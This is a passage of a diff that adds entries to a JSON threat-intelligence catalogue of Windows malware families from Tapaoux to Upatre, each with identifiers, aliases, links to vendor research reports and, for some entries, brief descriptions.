"71e77349-98f5-49c6-bff7-6ed3b3d79410", + "value": "Tapaoux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", + "value": "Tarsip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + ] + }, + "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", + "value": "tDiscoverer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", + "value": "TDTESS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", + "value": "TeleBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", + "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + ] + }, + "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", + "value": "TeleDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" + ] + }, + "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", + "value": "Tempedreve", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fakem RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", + 
"https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", + "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", + "value": "Terminator RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cryptesla" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", + "https://blogs.cisco.com/security/talos/teslacrypt", + "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", + "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", + "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + ] + }, + "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", + "value": "TeslaCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Alphabot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", + "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" + ] + }, + "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", + "value": "Thanatos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", + 
"https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", + "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" + ] + }, + "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", + "value": "Thanatos Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", + "value": "ThreeByte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", + "value": "ThumbThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" + ] + }, + "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", + "value": "Thunker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ] + }, + "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", + "value": "Tidepool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zusy", + "TinyBanker", + "Illi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", + 
"http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", + "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", + "http://garage4hackers.com/entry.php?b=3086", + "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://contagiodump.blogspot.com/2012/06/amazon.html", + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" + ] + }, + "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", + "value": "Tinba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", + "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" + ] + }, + "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", + "value": "TinyLoader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "NukeBot", + "Nuclear Bot", + "MicroBankingTrojan", + "Xbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", + "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", + "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + 
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" + ] + }, + "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", + "value": "TinyNuke", + "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + ] + }, + "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", + "value": "TinyTyphon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", + "value": "TinyZbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" + ] + }, + "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", + "value": "Tiop", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gheg" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + 
"https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.cert.pl/en/news/single/tofsee-en/", + "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" + ] + }, + "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", + "value": "Tofsee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", + "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", + "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" + ] + }, + "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", + "value": "TorrentLocker", + "description": "" + }, + { + "meta": { + "synonyms": [ + "huntpos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", + "http://adelmas.com/blog/treasurehunter.php", + "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", + "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" + ] + }, + "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", + "value": "TreasureHunter", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trickster", + "TheTrick", + "TrickLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + 
"https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + 
"http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.youtube.com/watch?v=EdchPEHnohw", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" + ] + }, + "uuid": "c824813c-9c79-4917-829a-af72529e8329", + "value": "TrickBot", + "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. 
Phish > Attached MS Office > Marco enabled > Trickbot installed" + }, + { + "meta": { + "synonyms": [ + "Trisis", + "HatMan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" + ] + }, + "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", + "value": "win.triton", + "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/5loyd/trochilus/" + ] + }, + "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", + "value": "Trochilus RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Shade" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", + "value": "Troldesh", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" + ] + }, + "uuid": 
"48deadcc-1a67-442d-b181-fdaaa337c4bb", + "value": "Trump Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" + ] + }, + "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", + "value": "Tsifiri", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", + "value": "TURNEDUP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", + "https://www.lastline.com/labsblog/tyupkin-atm-malware/" + ] + }, + "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", + "value": "Tyupkin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Akagi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", + "https://github.com/hfiref0x/UACME" + ] + }, + "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", + "value": "UACMe", + "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", + "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", + "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" + ] + }, + "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", + "value": "UDPoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", + "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" + ] + }, + "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", + "value": "Uiwix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" + ] + }, + "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", + "value": "Unidentified 001", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" + ] + }, + "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", + "value": "Unidentified 003", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" + ] + }, + "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", + "value": "Unidentified 006", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", + "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" + ] + }, + "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", + "value": "Unidentified 013 (Korean)", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", + "https://wikileaks.org/ciav7p1/cms/page_34308128.html" + ] + }, + "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", + "value": "Unidentified 020 (Vault7)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" + ] + }, + "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", + "value": "Unidentified 022 (Ransom)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" + ] + }, + "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", + "value": "Unidentified 023", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", + "https://twitter.com/malwrhunterteam/status/789161704106127360" + ] + }, + "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", + "value": "Unidentified 024 (Ransomware)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", + "http://malware-traffic-analysis.net/2016/05/09/index.html" + ] + }, + "uuid": "f43a0e38-2394-4538-a123-4a0457096058", + "value": "Unidentified 025 (Clickfraud)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" + ] + }, + "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", + "value": "Unidentified 028", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" + ] + }, + "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", + "value": 
"Unidentified 029", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", + "https://twitter.com/JaromirHorejsi/status/877811773826641920" + ] + }, + "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", + "value": "Filecoder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" + ] + }, + "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", + "value": "Unidentified 031", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" + ] + }, + "uuid": "799921d7-48e8-47a6-989e-487b527af37a", + "value": "Unidentified 032", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" + ] + }, + "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", + "value": "Unidentified 033", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", + "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" + ] + }, + "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", + "value": "Unidentified 034", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" + ] + }, + "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", + "value": "Unidentified 035", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" + ] + }, + "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", + "value": "Unidentified 037", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" + ] + }, + "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", + "value": "Unidentified 038", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" + ] + }, + "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", + "value": "Unidentified 039", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" + ] + }, + "uuid": "88d70171-fc89-44d1-8931-035c0b095247", + "value": "Unidentified 041", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", + "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" + ] + }, + "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", + "value": "Unidentified 042", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" + ] + }, + "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", + "value": "Unidentified 044", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" + ] + }, + "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", + "value": "Unidentified 045", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", + "https://twitter.com/DrunkBinary/status/1006534471687004160" + ] + }, + "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", + "value": "Unidentified 046", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ] + }, + "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", + "value": "Unidentified 047", + "description": "RAT written in Delphi used by Patchwork APT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", + "https://twitter.com/DrunkBinary/status/1002587521073721346" + ] + }, + "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", + "value": "Unidentified 048 (Lazarus?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" + ] + }, + "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", + "value": "Unidentified 049 (Lazarus/RAT)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", + "https://twitter.com/CDA/status/1014144988454772736" + ] + }, + "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", + "value": "Unidentified 051", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" + ] + }, + "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", + "value": "Unidentified 052", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", + "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + ] + }, + "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", + "value": "Unidentified 053 (Wonknu?)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", + "https://twitter.com/struppigel/status/810753660737073153", + "https://twitter.com/bartblaze/status/976188821078462465" + ] + }, + "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", + "value": "Unlock92", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rombrast" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", + "https://twitter.com/ulexec/status/1005096227741020160" + ] + }, + "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", + "value": "UPAS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", + "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + 